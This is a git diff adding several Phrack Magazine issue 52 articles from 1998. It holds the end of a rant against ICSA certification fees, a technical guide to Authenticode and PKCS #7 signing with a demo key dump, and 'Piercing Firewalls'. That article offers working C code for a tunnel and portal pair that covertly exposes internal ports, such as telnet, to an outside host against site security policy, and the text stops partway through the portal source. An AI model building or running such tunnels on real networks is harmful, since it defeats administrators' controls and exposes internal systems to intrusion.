+strongest.  If we choose to certify only some of our systems, we can only
+assume that attackers will them simply move on and attack our unprotected
+systems.  Perhaps if ICSA did not attempt to extort $8,500 for a single web
+server certification, more customers could have all of their web sites
+certified.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at how much faith ICSA puts in their own certifications:
+
+        "Customer shall defend, indemnify, and hold ICSA harmless from
+        and against any and all claims or lawsuits of any third party
+        and resulting costs (including reasonable attorneys' fees),
+        damages, losses, awards, and judgements based on any claim that
+        a ICSA-certified server/site/system was insecure, failed to meet
+        any security specifications, or was otherwise unable to
+        withstand an actual or simulated penetration.
+
+
+In plain English, they are saying that if you get sued, you are on your own.
+But wait, their faithlessness does not stop there:
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at how the ICSA sees it's legal relationship with it's
+customers:
+
+        "Customer, may, upon written notice and approval of ICSA, assume
+        the defense of any claim or legal proceeding using counsel of
+        it's choice. ICSA shall be entitled to participate in, but not
+        control, the defense of any such action, with it's own counsel
+        and at it's own expense: provided, that if ICSA, it its sole
+        discretion, determines that there exists a conflict of interest
+        between Customer and ICSA, ICSA shall have the right to engage
+        separate counsel, the reasonable costs of which shall be paid by
+        the customer. "
+
+What you, the customer, agree to when you sign up for ICSA certification is
+that you cannot even legally defend yourself in court until you have "written
+notice and approval of ICSA. "  But it's even worse that that, ICSA then
+reserves the right to hire lawyers and bill YOU for the expense if it feels
+that you are not sufficiently protecting it's interests.  Whose corporate
+legal department is going to okay a provision like this?
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at how much the ICSA attempts to charge for this garbage:
+
+        ===========================================================
+        | Web Certification                                       |
+        |                                                         |
+        |         1 Server                                $8,500  |
+        |         2-4 Servers                             $7,650  |
+        |         5 or more Servers                       $6,800  |
+        |                                                         |
+        |         6-10 DNS                                $  495  |
+        |         11 or more DNS                          $  395  |
+        |                                                         |
+        | Perimeter Check                                         |
+        |                                                         |
+        |         up to 15 Devices                        $3,995  |
+        |         additional groups of 10 Devices         $1,500  |
+        |         bi-monthly reports                      $1,000  |
+        |         monthly reports                         $3,500  |
+        |                                                         |
+        | War Dial                                                |
+        |                                                         |
+        |         first 250 phone lines                   $1,000  |
+        |         additional lines                        $3/line |
+        |                                                         |
+        | Per Diem                                                |
+        |                                                         |
+        |         Domestic                                $  995  |
+        |         International                           $1,995  |
+        |                                                         |
+        ===========================================================
+
+Certifying one web server will cost you $8,500.  I have seen small web servers
+purchased, installed, and designed for less than that amount.
+
+If you tell the ICSA that you have 15 network devices visible on the Internet
+and they discover 16 devices, they will bill you an additional $1,500.  This
+is what you agree to when you sign a ICSA Perimeter Check contract.  In
+effect, when you sign up for an ICSA Perimeter Check, you are agreeing to pay
+unspecified fees.
+
+To dial an entire prefix the ICSA will charge you $30,250.  I wonder if these
+folks are using ToneLoc.  I wonder if these fools are even using modems...
+
+I will leave judgement on the per diem rates to the reader.  How much would
+you pay for a clown to entertain at your daughters birthday party?  Would you
+give the clown a daily per diem of $995?  Why would you feel the ICSA clowns
+might deserve better?  How do you spend $995 a day and still manage to put in
+some work hours?
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+These are just a few excerpts from some ICSA documentation I managed to get my 
+hands on.  I do not feel my assessment has been any more harsh than these
+people deserve.  I am certain that if I had more of their literature, there
+would be even more flagrant examples of ignorance and greed.
+
+ICSA feeds on business people who are so ignorant as to fall for the ICSA
+propaganda.  By masquerading as a legitimate trade organization, they make
+everyone in the data security industry look bad.  By overcharging the
+clientele, they drain money from computer security budgets that could better
+be spent on securing systems and educating users.  By selling certifications
+with no actual technical validity behind them they fool Internet users into a
+false sense of security when using e-commerce sites.
+
+ISCA is good for no one and it is good for nothing.
+
+
+Dorathea Demming
+Mechanicsburg, PA
+10 Oct, 1997
+
+
+----[  EOF
+
diff --git a/phrack52/15.txt b/phrack52/15.txt
new file mode 100644
index 0000000..92af1cb
--- /dev/null
+++ b/phrack52/15.txt
@@ -0,0 +1,290 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 15 of 20
+
+
+-------------------------[  Technical Guide to Digital Certification
+
+
+--------[  Yggdrasil
+
+
+
+ Introduction
+ ~~~~~~~~~~~~
+  Today's software technology provides not only flexible controls for web pages 
+and complex remote interaction (ActiveX controls, Java applets and Netscape 
+plugins) but also offers the possibility of downloading pieces of code for
+local execution to extend browsers capabilities.  A major issue being the
+fact that this code cannot be initially distinguished from malicious code 
+(virii/trojans, "man in the middle" attacks, forced downgrade, forgery of 
+electronic documents, etc), disguised as utilities.
+
+  The point is that end users do not know who published of a piece of software,
+if the code has been tampered with, and what that software will do, (until they 
+download and execute it).  Anyone can create plugins, applets or controls 
+containing this potentially destructive code or even "intelligent" malevolent 
+code, able to communicate covertly with a remote server.
+
+  Public-key cryptography has produced a number of different implementations
+to verify the authenticity of software, network objects, documents and data
+transactions (for example, Electronic Funds Transfer) using Digital IDs.
+
+
+ Authenticode Certifications
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  Microsoft recently adopted Authenticode technology to sign their ActiveX 
+based software.  Any individual or commercial software publisher desiring
+their code to be "trusted" must apply for and receive a Digital Certificate
+from an Authenticode Certificate Authority (CA), such as VeriSign.  The CA
+will request proof-of-identity, and other information, only then will they 
+verify the publishers credentials (even employing Dun & Bradstreet rating).
+After the CA has decided that the publisher meets its policy criteria, it 
+releases a Certificate (the expected cost is about $500 for a year, plus 
+additional costs for hardware storage for commercial developers, up to 
+$12,000).
+
+[ God save the next-generation developers. ]
+
+  A Digital Certificate contains the publishers public-key (and other info)
+encrypted according to the industry standard X.509 V3 certificate format and
+PKCS #7 signed data standards.
+
+  The ITU-T recommendation for X.509 states that:
+
+"It would be a serious breach of security if the CA issued a certificate for
+ a user with a public key that had been tampered with."
+
+  All Certificates have an expiration time, but the CA may revoke them prior
+to that time if a publisher's private-key or CA's certificate is assumed to
+be compromised.  The CA may (or may NOT) inform the owner of the certificate.
+
+
+ Revocation Lists
+ ~~~~~~~~~~~~~~~~
+  The Revocation Lists, also called "black-lists", are held within entries as
+attributes of types CertificateRevocationList and AuthorityRevocationList.
+
+  Their attribute types are defined as follows:
+
+certificateRevocationList ATTRIBUTE ::= {
+  WITH SYNTAX CertificateList
+  EQUALITY MATCHING RULE certificateListExactMatch
+  ID id-at-certificateRevocationList }
+
+authorityRevocationList ATTRIBUTE ::= {
+  WITH SYNTAX CertificateList
+  EQUALITY MATCHING RULE certificateListExactMatch
+  ID id-at-authorityRevocationList }
+
+CertificateList ::= SIGNED { SEQUENCE {
+  version Version OPTIONAL,
+  signature AlgorithmIdentifier,                       <----+
+  issuer Name,                                              |
+  thisUpdate UTCTime,                                       |
+  nextUpdate UTCTime OPTIONAL,                          version 2
+  revokedCertificates SEQUENCE OF SEQUENCE {              only
+  userCertificate CertificateSerialNumber,             (extension)
+  revocationDate UTCTime,                                   |
+  crlEntryExtensions Extensions OPTIONAL } OPTIONAL,        |
+  crlExtensions [0] Extensions OPTIONAL }}             <----+
+
+
+ Implementation of X.509-3
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+  The ITU-T X.509 Directory Specification makes use of a set of cryptographic
+systems known as asymmetric Public-Key Crypto-Systems (PKCS).  This system
+involves the use of two keys (one secret and one public as used in common
+public key packages like PGP).
+
+  Both keys can be used for encoding: the private key to decipher if the
+public key was used, and vice versa (Xp*Xs = Xs*Xp, where Xp/Xs are the
+key-encoding/decoding functions).
+
+  When applied to Digital Signatures, the public key encryption is used to
+encipher the data to be signed after it's passed through a hash function.
+Information is signed by appending to it an enciphered summary of the info.
+The summary is produced by means of a one-way hash function, while the
+enciphering is carried out using the private key of the signer.
+
+  For further information about X.509 and certificate types please read
+the ITU-T Recommendation X.509 ("The Directory: Authentication Framework").
+
+
+ Windows Trust API
+ ~~~~~~~~~~~~~~~~~
+  To ascertain an objects reliability under Win32, the WinVerifyTrust() API
+function is used, according to its prototype as follows:
+
+  HRESULT                      ---------------  Description  ---------------
+  WINAPI
+  WinVerifyTrust (
+    HWND hwnd,                 <>0 to allow user to assist in trust decision
+    DWORD dwTrustProvider,     0 = provider unknown, 1 = software publisher
+    DWORD dwActionID,          specifies what to verify
+    LPVOID ActionData          information required by the trust provider
+  )
+
+  The HRESULT return code will be TRUST_E_SUBJECT_NOT_TRUSTED if the object
+is not trusted (according to the specified action in dwActionID).  An error
+code more detailed than this could be provided by the trust provider.
+
+
+ Creation of a Digitally Signed message
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  PKCS #7 specifies several "types", such as ContentInfo, SignedData and
+SignerInfo.  Version 1.5 of PKCS #7 describes the ContentInfo type as:
+
+ContentInfo ::= SEQUENCE {
+  contentType ContentType,
+  content
+    [0] EXPLICIT ANY DEFINED BY contentType OPTIONAL }
+
+ContentType ::= OBJECT IDENTIFIER
+
+the content is (or better: MAY be) an octet-stream ASCII string to be passed
+to the selected digest algorithm (an example is MD2, see RFC-1321).
+
+The first step is to encode the ContentInfo field according to PKCS #7.
+This is the resulting encoded data:
+
+== DATA BLOCK #1 ==
+
+{30 28} 06 09                               0x0609: contentType = data
+2A 86 48 86 F7 0D 01 07 01                  PKCS #7 data-object ID
+A0 1B                                       [0] EXPLICIT
+   04 [msg_len]                             content = OCTET STRING
+      [octet stream representing
+       the ASCII string, msg_len bytes long]          <-- value (*)
+
+This (*) data is the input stream to the encoding algorithm (MD2 or other):
+
+(the identifier of the PKCS #7 data object is {1 2 840 113549 1 7 1})
+
+== DATA BLOCK #2 ==
+
+{30 20} 30 0C                               0x300C: digestAlgorithm
+06 08 2A 86 48 86 F7 0D 02 02               algorithm ID = MD2
+05 00                                       parameters = NULL (0x00)
+   04 [block_len]                           digest
+      [encoded data (MD2 output)]
+
+(the object identifier of the MD2 algorithm is {1 2 840 113549 2 2})
+
+This data is the encoded DigestInfo.  It will be encrypted under RSA using
+the user's private key.
+
+According to PKCS #1, RSA encryption has two main steps: an encryption data
+block is constructed from a padding string and the prefixed message digest;
+then the encryption block is exponentiated with the user's private key.
+
+The encryption block EB is the following 64-octet string:
+
+00 01                                       block type
+FF FF FF FF FF FF FF FF FF FF FF FF FF FF   padding string
+FF FF FF FF FF FF FF FF FF FF FF FF FF
+00                                          separator (0x00)
+[here goes the whole DATA BLOCK #2]         data bytes (prf. message digest)
+
+Now we need to encode various information: a SignedData value from the inner
+ContentInfo value, then the encrypted message digest, the issuer and serial
+number of the user's certificate, the certificate data, the message digest
+algorithm ID (MD2) and the encryption algorithm ID (PKCS #1 RSA).
+
+The encoded SignedData is:
+
+== DATA BLOCK #3 ==
+
+30 82 02 3D
+02 01 01                                    version = 1
+31 [size of inner data block]               digestAlgorithms
+   30 [size]
+      06 08 2A 86 48 86 F7 0D 02 02         algorithm ID = MD2
+      05 00                                 parameters = NULL (0x00)
+   [ContentInfo data]                       content = inner ContentInfo
+A0 82 01 [size]                             certificates
+   [certificate data]                       user's certificate
+31 81 [size]                                signerInfos
+   30 81 [size]
+   02 01 01                                 version = 1
+      30 [size]                             issuerAndSerialNumber
+         [issuer data]                      issuer
+         02 04 {12 34 56 78}                size (4), serialNumber (12345678)
+      30 [alg_size]                         digestAlgorithm
+         06 08 2A 86 48 86 F7 0D 02 02      algorithm ID = MD2
+         05 00                              parameters = NULL (0x00)
+      30 [dig_size]                         digestEncryptionAlgorithm
+         06 [sz]                            rsaEncryption (d.E.A.)
+            2A 86 48 86 F7 0D 01 01 01
+         05 00                              parameters = NULL (0x00)
+      04 [data_size]                        encryptedDigest
+         [encrypted digestInfo encoded data block]
+
+Finally, a ContentInfo value from this SignedData data block is encoded (once
+again, using PKCS #7):
+
+30 82 02 [size]
+   06 09 2A 86 48 86 F7 0D 01 07 02         contentType = signedData
+   A0 82 02 [size]                          [0] EXPLICIT
+      [here goes the whole DATA BLOCK #3]   content = SignedData value
+
+(the object identifier of PKCS #7 signedData is {1 2 840 113549 1 7 2})
+
+
+ PKCS Key Example
+ ~~~~~~~~~~~~~~~~
+  The following is the full hex dump of the above PKCS #7 encoded key.
+
+
+HEX Dump -------------------------------------:   ASCII Dump ----:
+
+30 82 02 50 06 09 2A 86 48 86 F7 0D 01 07 02 A0   0..P..*.H.......
+82 02 41 30 82 02 3D 02 01 01 31 0E 30 0C 06 08   ..A0..=...1.0...
+2A 86 48 86 F7 0D 02 02 05 00 30 28 06 09 2A 86   *.H.......0(..*.
+48 86 F7 0D 01 07 01 A0 1B 04 19 41 20 64 65 6D   H..........A dem
+6F 20 43 6F 6E 74 65 6E 74 49 6E 66 6F 20 73 74   o ContentInfo st
+72 69 6E 67 A0 82 01 5E 30 82 01 5A 30 82 01 04   ring...^0..Z0...
+02 04 14 00 00 29 30 0D 06 09 2A 86 48 86 F7 0D   .....)0...*.H...
+01 01 02 05 00 30 2C 31 0B 30 09 06 03 55 04 06   .....0,1.0...U..
+13 02 55 53 31 1D 30 1B 06 03 55 04 0A 13 14 45   ..US1.0...U....E
+78 61 6D 70 6C 65 20 4F 72 67 61 6E 69 7A 61 74   xample Organizat
+69 6F 6E 30 1E 17 0D 39 32 30 39 30 39 32 32 31   ion0...920909221
+38 30 36 5A 17 0D 39 34 30 39 30 39 32 32 31 38   806Z..9409092218
+30 35 5A 30 42 31 0B 30 09 06 03 55 04 06 13 02   05Z0B1.0...U....
+55 53 31 1D 30 1B 06 03 55 04 0A 13 14 45 78 61   US1.0...U....Exa
+6D 70 6C 65 20 4F 72 67 61 6E 69 7A 61 74 69 6F   mple Organizatio
+6E 31 14 30 12 06 03 55 04 03 13 0B 41 20 64 65   n1.0...U....A de
+6D 6F 20 55 73 65 72 30 5B 30 0D 06 09 2A 86 48   mo User0[0...*.H
+86 F7 0D 01 01 01 05 00 03 4A 00 30 47 02 40 0A   .........J.0G.@.
+66 79 1D C6 98 81 68 DE 7A B7 74 19 BB 7F B0 C0   fy....h.z.t.....
+01 C6 27 10 27 00 75 14 29 42 E1 9A 8D 8C 51 D0   ..'.'.u.)B....Q.
+53 B3 E3 78 2A 1D E5 DC 5A F4 EB E9 94 68 17 01   S..x*...Z....h..
+14 A1 DF E6 7C DC 9A 9A F5 5D 65 56 20 BB AB 02   ....|....]eV ...
+03 01 00 01 30 0D 06 09 2A 86 48 86 F7 0D 01 01   ....0...*.H.....
+02 05 00 03 41 00 45 1A A1 E1 AA 77 20 4A 5F CD   ....A.E....w J_.
+F5 76 06 9D 02 F7 32 C2 6F 36 7B 0D 57 8A 6E 64   .v....2.o6{.W.nd
+F3 9A 91 1F 47 95 DF 09 94 34 05 11 A0 D1 DF 4A   ....G....4.....J
+20 B2 6A 77 4C CA EF 75 FC 69 2E 54 C2 A1 93 7C    .jwL..u.i.T...|
+07 11 26 9D 9B 16 31 81 9B 30 81 98 02 01 01 30   ..&...1..0.....0
+34 30 2C 31 0B 30 09 06 03 55 04 06 13 02 55 53   40,1.0...U....US
+31 1D 30 1B 06 03 55 04 0A 13 14 45 78 61 6D 70   1.0...U....Examp
+6C 65 20 4F 72 67 61 6E 69 7A 61 74 69 6F 6E 02   le Organization.
+04 14 00 00 29 30 0C 06 08 2A 86 48 86 F7 0D 02   ....)0...*.H....
+02 05 00 30 0D 06 09 2A 86 48 86 F7 0D 01 01 01   ...0...*.H......
+05 00 04 40 05 FA 6A 81 2F C7 DF 8B F4 F2 54 25   ...@..j./.....T%
+09 E0 3E 84 6E 11 B9 C6 20 BE 20 09 EF B4 40 EF   ..>.n... . ...@.
+BC C6 69 21 69 94 AC 04 F3 41 B5 7D 05 20 2D 42   ..i!i....A.}. -B
+8F B2 A2 7B 5C 77 DF D9 B1 5B FC 3D 55 93 53 50   ...{\w...[.=U.SP
+34 10 C1 E1 E1                                    4....
+
+  Many other demo (not only ;) keys, tons of related C++ source/libraries for
+Linux and Win32 and documentation can be found on my web site at this address
+(case sensitive):
+
+  http://members.tripod.com/~xception_0x0A28/penumbra.html
+
+
+                 "That which does not kill us
+                  makes us stronger"
+                                     -- Friedrich Nietzsche
+
+----[  EOF
+
diff --git a/phrack52/16.txt b/phrack52/16.txt
new file mode 100644
index 0000000..43c0bd0
--- /dev/null
+++ b/phrack52/16.txt
@@ -0,0 +1,983 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 16 of 20
+
+
+-------------------------[  Piercing Firewalls
+
+
+--------[  bishnu@hotmail.com
+
+
+Introduction:
+
+    Many ISPs manage a firewall to protect their users against the hostile
+Internet.  While the firewall might protect the users, it also serves to limit
+their freedom.
+
+    Most firewalls don't allow a connection to be established if the
+initiative is coming from the outside, as this automatically disables many
+security vulnerabilities.  Unfortunately, this also means that many other
+things are not possible; for example, sending an X-display to a machine behind 
+the firewall, or something similar.
+
+    One solution is to ask the firewall administrator to configure the firewall
+not to disable X connections (or the port you plan to use.  This normally
+means allowing connections on port 6000 to penetrate the firewall.  But often
+the admin does not want to, as he is either too busy, hasn't figured out how
+to configure the firewall yet, or simply refuses to, as it violates the site
+security policy.  Maybe you don't even want him to know that you plan to send
+some traffic backwards.
+
+    For this purpose I wrote two simple programs that transmit TCP connections
+back thorough a tunnel, to your machine.
+
+
+The tunnel:
+
+    The solution is two programs, one running at your machine, or some other
+machine behind the firewall, and another running at some *NIX-box on the
+Internet.  The program behind the firewall (called tunnel) connects to a
+program (called portal) on the machine on the Internet.  This connection
+probably won't be intercepted by the firewall (depending on the security
+policy), as it is outgoing.  Once the connection from the tunnel to the portal
+is established, the portal opens a port for incoming TCP traffic, and we are
+ready to rock.  Whenever a machine connects to the portal it sends the request
+back to the tunnel thorough the already established connection through the
+firewall, the tunnel will then forward the connection to your machine.
+
+    The effect will be that you drag a port on your machine (or any machine
+behind the firewall) onto the other side of the firewall, which means that
+anyone can connect to it regardless of the site's security policy.
+
+An example: 
+
+Goof: Your machine.
+Foo : Some other machine behind the firewall or same as Goof, running 'tunnel'.
+Bar : Some machine on the other side of the firewall running 'portal'.
+Boof: Some machine wanting to connect to machine Goof, or same as Bar.
+
+                  FIREWALL
+  tunnel             ^          portal
+#########            ^         #########
+#  Foo  #======================#  Bar  #
+#########            ^         #########
+    |                ^             |
+    |                ^             |
+    |                ^             |
+#########            ^         #########
+# Goof  #            ^         # Boof  #
+#########            ^         #########
+                  FIREWALL
+
+
+
+   You are sitting on machine Goof, and you run some program on machine Boof,
+this program happens to be using X-windows, so you want to send the display
+back to machine Goof. X-windows tries to establish a TCP connection through
+the firewall, which is 'burned'.
+
+   So you start the tunnel on machine Foo, and set it to connect to machine
+Bar at lets say port 7000 (where the portal is running), also you set the
+tunnel to forward all TCP connections, coming back from the portal, to your
+machine Goof on port 6000 (X-windows).  You start the portal on machine Bar,
+and you make it listen for the tunnel on port 7000.  Once the tunnel has
+connected, the portal listens on port 6001 for incoming X.  Whenever some
+X-application connects to the portal, the connection is passed to the tunnel,
+which then forwards it to machine Goof on port 6000.
+
+   Finally on machine Boof you set your display to machine Bar:1 (in a tcsh
+type 'setenv DISPLAY bar:1', in bash 'export DISPLAY=bar:1'), which tells the
+application to use port 6001 (We can't use port 6000 if the machine is running
+a X-server itself). You start your Xeyes, and they pop in your face.
+
+
+Conclusion:
+
+   If you use this program to cross a firewall you surely violate the ISP's
+security policy, as anybody can cross it as well, that is if they know, and 
+there is nothing like security by obscurity.  So don't tell your mom.
+
+   An advantage of this approach is that you don't need to have root access on 
+either machine, which is makes the whole process a bit easier. 
+
+To compile the code, just do a `make`.  It has been tested on
+    Solaris 2.5.x, 2.6
+    IRIX 6.[2,3,4]
+    FreeBSD 2.1.5
+    HPUX 10.x
+    Linux 2.0.x
+
+
+----[  THE CODE
+
+
+<++> tunnel/Makefile
+CC = gcc
+
+OSFLAGS = 
+MYFLAGS = -Wall -O2 -g -pedantic
+CFLAGS = $(MYFLAGS) $(PROFILE) $(OSFLAGS)
+
+#If you compile on Solaris 2.x, uncomment the following line
+#LOCAL_LIBRARIES = -lsocket
+
+TUNNEL_OBJFILES = tunnel.o share.o
+PORTAL_OBJFILES = portal.o share.o
+
+all: tunnel portal
+
+tunnel :   $(TUNNEL_OBJFILES) share.h
+	   $(CC) $(TUNNEL_OBJFILES) $(LOCAL_LIBRARIES) -o tunnel
+tunnel.o : tunnel.c share.h
+	$(CC) -c $(CFLAGS) $(COMMFLAGS) tunnel.c
+portal :   $(PORTAL_OBJFILES) share.h
+	   $(CC) $(PORTAL_OBJFILES) $(LOCAL_LIBRARIES) -o portal
+portal.o : portal.c share.h
+	$(CC) -c $(CFLAGS) $(COMMFLAGS) portal.c
+share.o : share.c share.h
+	$(CC) -c $(CFLAGS) $(COMMFLAGS) share.c
+clean:
+	rm -f *.o tunnel portal core
+<-->
+<++> tunnel/tunnel.c
+/*
+-TUNNEL-
+
+This is the tunnel part of my firewall piercer. This code is supposed
+to be running on the inside of the firewall. The tunnel should then
+connect to the portal running on the outside.  
+
+start it like:
+>% tunnel localhost 23 protal.machine.com 3001
+
+if the portal is running at port 3001 at portal.machine.com, incoming
+connections to the portal will get rerouted to this machines telnet
+port.
+
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h> 
+#include <netinet/in.h> 
+#include <sys/socket.h> 
+#include <sys/time.h> 
+#include <string.h> 
+#include <signal.h>
+#include <errno.h>
+#include "share.h"
+
+
+extern char tunnel_buf[MAXLEN*2];
+char buf[MAXLEN*2];
+extern int tunnel_des;   /* The socket destination of a tunnel packet*/
+extern int tunnel_src;   /* The socket source of a tunel packet*/
+extern int tunnel_size;  /* Size of tunnel packet*/
+extern struct connections connections; /*Linked list of connections*/
+
+char *remote_machine;                /*remote machine name to tunnel to*/
+extern int  tunnel_port;             /*tunnel port*/
+extern int  tunnel_sock;             /*tunnel socket*/
+char *login_machine="";              /*machine to forward connections to*/
+int login_port;                      /*port to forward connections to*/
+
+int oldtime=0,ping_time=0;
+struct connection *descriptors[DESC_MAX];
+extern struct connection *descriptors[DESC_MAX];
+extern int errno;
+FILE *log=stdout;             /*logfile = stdout by default*/
+
+void open_tunnel(){
+  tunnel_sock=remote_connect(remote_machine,tunnel_port);
+}
+
+
+extern int optind;
+extern char *optarg;
+
+void usage(){
+  printf("Usage: tunnel [-l logfile] <forward_machine> <forward_port>" \
+	 " <portal_machine> <portal_port>\n");
+  printf("where:\n");
+  printf("forward_machine is the machine to which the traffic is forwarded\n");
+  printf("forward_port is the port to which the traffic is forwarded\n");
+  printf("portal_machine is the machine we want to route the trafic from\n");
+  printf("portal_port is the port we want to route the trafic from\n");
+  printf("Coded by %s\n",AUTHOR);
+}
+
+
+/********************** Get the options ***********************/
+
+void get_options(int argc,char *argv[]){
+  int c;
+  while((c=getopt(argc,argv, "l:")) !=-1)
+    switch(c){
+    case 'l':
+      if(!(log=fopen(optarg,"w"))){
+	log=stdout;
+	fprintf(log,"Unable to open logfile '%s':%s\n",
+		optarg,strerror(errno));
+      }
+      break;
+    case '?':
+    default:
+      usage();
+      exit(-1);
+    }
+  /* the two next options*/
+  if(argc-optind!=4){
+    printf("Wrong number of options!\n");
+    usage();
+    exit(-1);
+  }
+  login_machine=get_ip(argv[optind++]);
+  login_port=atoi(argv[optind++]);
+  remote_machine=get_ip(argv[optind++]);
+  tunnel_port=atoi(argv[optind++]);
+  if(login_port<1||login_port>65535||tunnel_port<1||tunnel_port>65535){ 
+    printf("Ports below 1 and above 65535 don't give any sense\n"); 
+    usage(); 
+    exit(-1);
+  } 
+}
+
+void alive(){
+  /* To check wether the line is still alive, we Myping it every
+     ALIVE_TIME seconds. If we don't get a ping from the tunnel
+     every ALIVE_TIME*2 we disconnect the connection to the
+     portal, and wait for a new.  If the portal has not died, all
+     the connections through the tunnel will continue as normal once
+     the connection has been established again.
+     The reason why I do this is because some firewalls tend to
+     disable connections if there hasn't been any traffic for some time, 
+     or if the connection had been up too long time.
+     */
+  
+  /*Transmit a Myping packet, we receive the 
+    answer in check_tunnel_connection()*/
+  if(time(NULL)-oldtime>=ALIVE_TIME){
+    oldtime=time(NULL);
+    transmit_tunnel(buf,0,0,0); 
+  }
+  if(time(NULL)-ping_time>ALIVE_TIME*2){
+    printf("Connection to portal probably lost, hanging up.\n");
+    shutdown(tunnel_sock,2);
+    close(tunnel_sock);
+    tunnel_sock=-1;
+  }
+}
+
+int reset_selector(fd_set *selector,fd_set *errsel,struct connection *con)
+{
+  /* We tell the selector to look on the tunnel socket aswell 
+     as our live connections.*/
+  int maxsock,i;
+  FD_ZERO(selector);
+  FD_SET(tunnel_sock,selector);
+  FD_SET(tunnel_sock,errsel);
+  con=connections.head;
+  maxsock=tunnel_sock;
+  for(i=0;i<connections.num;i++,con=con->next){
+    FD_SET(con->local_sock,selector);
+    FD_SET(con->local_sock,errsel);
+    maxsock=max(maxsock,con->local_sock);
+  }
+  return(maxsock); /*We return the maximum socket number*/
+}
+
+void check_tunnel_connection(fd_set *selector,fd_set *errsel,struct connection *con){
+  /*Here we check the tunnel for incoming data*/
+  if(FD_ISSET(tunnel_sock,errsel)){
+    fprintf(log,"Tunnel connection terminated!\n");
+    shutdown(tunnel_sock,2);
+    close(tunnel_sock);
+    tunnel_sock=-1;
+    return;
+  }
+  if(FD_ISSET(tunnel_sock,selector)){
+    if(receive_tunnel()!=-1){
+      if(tunnel_src==0&&tunnel_des==0){ /*We have a Myping packet*/
+	ping_time=time(NULL); /*reset the alive_timer*/
+      }
+      else if(tunnel_src==0){/*We have a 'hangup' signal for a connection*/
+	if((con=descriptors[tunnel_des])){
+	  fprintf(log,"Removing connection to %s %d\n",con->host,con->port);
+	  removeconnection(con);
+	}
+      }
+      else if(tunnel_des==0){ /*We have a new connection*/
+	  int newsock;
+	  if((newsock=remote_connect(login_machine,login_port))!=-1){
+	    connections.num++;
+	    con=(struct connection *)malloc(sizeof(struct connection));
+	    con->host=(char *)malloc(MAX_HOSTNAME_SIZE);
+	    strncpy(con->host,&tunnel_buf[4],MAX_HOSTNAME_SIZE);
+	    con->port=ntohl((((int *)tunnel_buf)[0]));
+	    con->local_sock=newsock;
+	    con->remote_sock=tunnel_src;
+	    con->time=time(NULL);
+	    con->next=connections.head;
+	    connections.head=con;
+	    descriptors[newsock]=con;
+	    fprintf(log,"Connected the incoming call from %s %d to %s %d\n",con->host,con->port,login_machine,login_port);
+	    /*Acknowledge the new connection to the portal*/
+	    transmit_tunnel(buf,0,con->local_sock,con->remote_sock);
+	  } 
+	}
+      else if(descriptors[tunnel_des]){
+	/*Send the data to the right descriptor*/
+	writen(descriptors[tunnel_des]->local_sock,tunnel_buf,tunnel_size);
+      }
+      else{
+	fprintf(log,"Connection to unallocated channel, hangup signal sent\n");
+	/*Send a hangup signal to the portal, to disable the connection*/
+	transmit_tunnel(buf,0,0,tunnel_src);
+      }
+    }
+  }
+}
+
+void main(int argc,char **argv)
+{
+  get_options(argc,argv);
+  fprintf(log,"Opening tunnel to %s port %d\n",remote_machine,tunnel_port);
+  fprintf(log,"Tunnelconnections will be forwarded to host %s"\
+	  " port %d\n",login_machine,login_port);
+  connections.num=0;
+  connections.head=NULL;
+  signal(SIGINT,ctrlC);
+  while(1){                       /*The tunnel runs infinitely*/
+    struct connection *con=connections.head;
+    open_tunnel();
+    ping_time=time(NULL);
+    while(tunnel_sock!=-1){
+      fd_set selector,errsel;
+      struct timeval alive_time;
+      alive_time.tv_sec=ALIVE_TIME;
+      alive_time.tv_usec=0;
+      alive();   /*Check wether the tunnelconnection is alive*/
+      /* We have to listen to the tunnel and all the current connections.
+       we do that with a select call*/
+      if(select(reset_selector(&selector,&errsel,con)+1,
+		&selector,NULL,&errsel,&alive_time)){
+	/*Check for each of the local connections*/
+	check_local_connections(&selector,&errsel,con);
+	/*Check for the tunnel*/
+	check_tunnel_connection(&selector,&errsel,con);
+      }
+    }
+    sleep(RETRY_TIME); /*We sleep a while*/ 
+    /* fprintf(log,"Trying to connect to portal.\n"); */
+  }
+}
+<-->
+<++> tunnel/portal.c
+/*
+-PORTAL-
+
+This is the portal part of my firewall piercer. This code is supposed
+to be running on the outside of the firewall. The tunnel part should
+then connect trough the firewall to this program.
+start it like:
+>% portal 3000 3001
+for tunnel connection on port 3001 and incoming calls on 3000.
+
+when you connect to the portal at port 3000 your connection will be
+forwarded to the tunnel.
+
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netinet/in.h> 
+#include <sys/socket.h> 
+#include <sys/time.h>
+#include <string.h>
+#include <netdb.h> 
+#include <unistd.h>
+#include <signal.h>
+#include <errno.h>
+#include "share.h"
+
+/***************/
+/* Global data */
+/***************/
+extern char tunnel_buf[MAXLEN*2];
+extern int tunnel_des;
+extern int tunnel_src;
+extern int tunnel_size;
+extern struct connections connections;
+extern struct connection *descriptors[DESC_MAX];
+extern int errno;
+extern int  tunnel_port;             /*tunnel port*/
+extern int  tunnel_sock;             /*tunnel new accepted socket*/
+
+char buf[MAXLEN*2];
+char *remote_machine;         /*remote machine name*/
+int  tunnel_basesock;         /*tunnel base socket*/
+int local_sock;               /* local port socket*/
+int local_port;               /*local machine port*/
+FILE *log=stdout;             /*logfile = stdout by default*/
+int ping_time=0;
+
+
+/********************** Usage  ***********************/
+void usage(){
+
+  fprintf(stderr,"Usage: portal [-l logfile] <local_port> <tunnel_port>\n");
+  fprintf(stderr,"where:\n");
+  fprintf(stderr,"local_port is the port where we accept incoming" \
